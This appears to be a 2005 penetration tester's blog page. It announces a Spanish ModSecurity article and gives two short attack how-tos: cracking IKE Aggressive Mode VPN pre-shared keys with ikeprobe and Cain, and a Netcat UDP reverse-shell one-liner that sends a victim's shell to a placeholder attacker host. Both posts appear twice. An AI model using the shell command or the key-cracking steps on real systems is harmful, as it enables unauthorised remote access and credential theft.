I wrote an article about Modsecurity, an apache module that work as an application Firewall. The paper is written in Spanish because the lack of spanish documentation about it. I wrote it for a monthly publication for the company i work.
You can get it at:
HTML Version: http://www.isecauditors.com/es/iseclab4.html
PDF Version: http://www.isecauditors.com/downloads/artic/iseclab4.pdf
Enjoy
Friday, May 27, 2005
Thursday, May 12, 2005
Ike Aggressive Mode Cracking
If you are doing a Pentest and you find a Vpn server there is a chance that it support Aggressive Mode, so what could we do?
1-Use Ikeprobe to check if the server support Aggressive Mode: ikeprobe ipserver
2-If we are lucky and there is a match, then we have to configure a vpn client (Safenet for example) with the information we have, we doesnt have the pre-shared key but doesnt matter, that is what we looking for.
3-Before firing up the vpn client, we have to put Cain to sniff the network traffic.
4-After the failed attempt Cain will have a sniffed the preshared key hash, now we send it to the Cain cracker.
5-And then we can launch Dictionary attack and if it fails, we can try brute force attack. We have to wait and wait... until the password is revealed.
That's all
1-Use Ikeprobe to check if the server support Aggressive Mode: ikeprobe ipserver
2-If we are lucky and there is a match, then we have to configure a vpn client (Safenet for example) with the information we have, we doesnt have the pre-shared key but doesnt matter, that is what we looking for.
3-Before firing up the vpn client, we have to put Cain to sniff the network traffic.
4-After the failed attempt Cain will have a sniffed the preshared key hash, now we send it to the Cain cracker.
5-And then we can launch Dictionary attack and if it fails, we can try brute force attack. We have to wait and wait... until the password is revealed.
That's all
Netcat Udp shell
Here is a little memory helper about the uses of Netcat, an udp shell.
On the attacker:
Terminal 1: nc -lun -p 4444
Terminal 2: nc -lun -p 5555
On the Victim:
echo""|nc -un ipattacker 4444 | nc -un ipattacker 5555
So you type the commands on the Terminal 1 and you receive the output on Terminal 2.
This also apply to tcp
On the attacker:
Terminal 1: nc -lun -p 4444
Terminal 2: nc -lun -p 5555
On the Victim:
echo""|nc -un ipattacker 4444 | nc -un ipattacker 5555
So you type the commands on the Terminal 1 and you receive the output on Terminal 2.
This also apply to tcp
Subscribe to:
Posts (Atom)